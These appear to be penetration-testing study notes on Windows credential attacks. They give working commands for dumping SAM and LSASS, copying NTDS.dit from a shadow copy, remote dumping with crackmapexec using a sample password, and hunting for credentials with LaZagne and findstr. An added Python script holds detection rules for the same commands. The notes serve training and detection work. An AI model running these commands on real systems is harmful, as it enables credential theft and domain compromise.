Windows Local Password Attacks

Attacking SAM

# Copy Registry Hives
# Admin privileges needed
reg.exe save hklm\sam C:\sam.save
reg.exe save hklm\system C:\system.save
reg.exe save hklm\security C:\security.save

# Copy To Local (Attacking) Machine
move sam.save \\<IP>\share

# Dump Hashes
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

# Dump SAM Remotely (local authentication)
crackmapexec smb <IP> --local-auth -u bob -p HTB_@cademy_stdnt! --sam

Attacking LSASS

Dumping LSASS

# Finding LSASS PID
tasklist /svc
Get-Process lsass

# Parse the LSASS minidump (.dmp) offline
pypykatz lsa minidump lsass.dmp

Generating Usernames

https://github.com/urbanadventurer/username-anarchy

./username-anarchy -i <usernames.list>

Capturing NTDS.dit

Shadow Copy (Manual)

# Creating Shadow Copy
## Admin privileges needed
vssadmin CREATE SHADOW /For=C:

# Copy NTDS from vss
cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit

CrackMapExec (Automatic & Faster)

crackmapexec smb <ip> -u <user> -p <pass> --ntds

Credential Hunting

Lazagne

Tool: https://github.com/AlessandroZ/LaZagne

# Start LaZagne (all modules)
start lazagne.exe all

Find Command

findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml
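Added example, not part of the original notes: from the defender's side, every technique on this page (SAM/SYSTEM hive export with reg.exe, LSASS minidump handling, shadow copy creation followed by an NTDS.dit copy, and findstr/LaZagne credential hunting) leaves a recognisable process command line in endpoint telemetry. The script below runs simple detection rules over constructed sample lines in a `user|image|command line` format (an assumed format, not a real Windows event log layout) and then correlates hits per user so that paired steps such as `hklm\sam` plus `hklm\system`, or `vssadmin CREATE SHADOW` plus a `HarddiskVolumeShadowCopy` NTDS.dit copy, surface as a likely credential-theft chain rather than isolated alerts. The rule names and the threshold are assumptions.

```python
"""Detection rules for the credential-dumping command lines on this page.

Added example. Input format is constructed for the demo:
    <user>|<process image>|<command line>
Real deployments would feed Sysmon Event ID 1 or Security 4688 command lines.
"""
import re
from collections import namedtuple

Finding = namedtuple("Finding", "rule user process command")

# (assumed rule name, regex applied to the full command line)
RULES = [
    ("sam_hive_export",
     re.compile(r"\breg(?:\.exe)?\s+save\s+hklm\\sam\b", re.I)),
    ("system_or_security_hive_export",
     re.compile(r"\breg(?:\.exe)?\s+save\s+hklm\\(?:system|security)\b", re.I)),
    ("lsass_minidump_handled",
     re.compile(r"lsass\.dmp|pypykatz\s+lsa\s+minidump", re.I)),
    ("shadow_copy_created",
     re.compile(r"\bvssadmin(?:\.exe)?\s+create\s+shadow\b", re.I)),
    ("ntds_copied_from_shadow",
     re.compile(r"HarddiskVolumeShadowCopy\d+.*\\NTDS\.dit", re.I)),
    ("credential_hunting",
     re.compile(r"\bfindstr(?:\.exe)?\b.*password|\blazagne(?:\.exe)?\b", re.I)),
]

# A user who trips this many distinct rules is flagged as a chain (assumed value).
CHAIN_THRESHOLD = 2

# Constructed sample telemetry; the command lines mirror the ones in these notes.
SAMPLE_LOG = """\
CORP\\jsmith|C:\\Windows\\System32\\reg.exe|reg.exe save hklm\\sam C:\\sam.save
CORP\\jsmith|C:\\Windows\\System32\\reg.exe|reg.exe save hklm\\system C:\\system.save
CORP\\jsmith|C:\\Windows\\System32\\cmd.exe|cmd.exe /c move C:\\sam.save \\\\10.0.0.5\\share
CORP\\jsmith|C:\\Python\\python.exe|pypykatz lsa minidump C:\\temp\\lsass.dmp
CORP\\svc_backup|C:\\Windows\\System32\\vssadmin.exe|vssadmin CREATE SHADOW /For=C:
CORP\\svc_backup|C:\\Windows\\System32\\cmd.exe|cmd.exe /c copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy2\\Windows\\NTDS\\NTDS.dit c:\\NTDS\\NTDS.dit
CORP\\amiller|C:\\Windows\\System32\\findstr.exe|findstr /SIM /C:"password" *.txt *.ini *.config
CORP\\amiller|C:\\Windows\\System32\\notepad.exe|notepad.exe C:\\Users\\amiller\\notes.txt
malformed line without separators
"""


def parse_line(line):
    """Split one telemetry line into (user, process, command); None if malformed."""
    parts = line.rstrip("\n").split("|", 2)
    if len(parts) != 3:
        return None
    user, process, command = (p.strip() for p in parts)
    return user, process, command


def scan(lines):
    """Apply every rule to every well-formed line; return all findings in order."""
    findings = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue  # skip lines the collector could not format
        user, process, command = parsed
        for name, pattern in RULES:
            if pattern.search(command):
                findings.append(Finding(name, user, process, command))
    return findings


def correlate(findings):
    """Return {user: sorted rule names} for users hitting >= CHAIN_THRESHOLD rules.

    Single hits (e.g. one findstr) are noisy; a user who exports hklm\\sam AND
    hklm\\system, or creates a shadow copy AND copies NTDS.dit out of it, is
    far more likely to be dumping credentials.
    """
    per_user = {}
    for f in findings:
        per_user.setdefault(f.user, set()).add(f.rule)
    return {u: sorted(r) for u, r in per_user.items() if len(r) >= CHAIN_THRESHOLD}


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG.splitlines())
    for h in hits:
        print(f"[{h.rule}] {h.user}: {h.command}")
    for user, rules in correlate(hits).items():
        print(f"CHAIN  {user}: {', '.join(rules)}")
```

Remote dumping with crackmapexec (`--sam`, `--ntds`) runs on the attacker's host and leaves no local command line to match; on the target it shows up as remote registry/SMB activity and, for `--ntds`, shadow-copy creation, so those events need their own rules on the server side. The regexes are deliberately loose on `.exe` suffixes and whitespace because renamed binaries and extra spaces are the first evasions a reviewer will see in practice.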
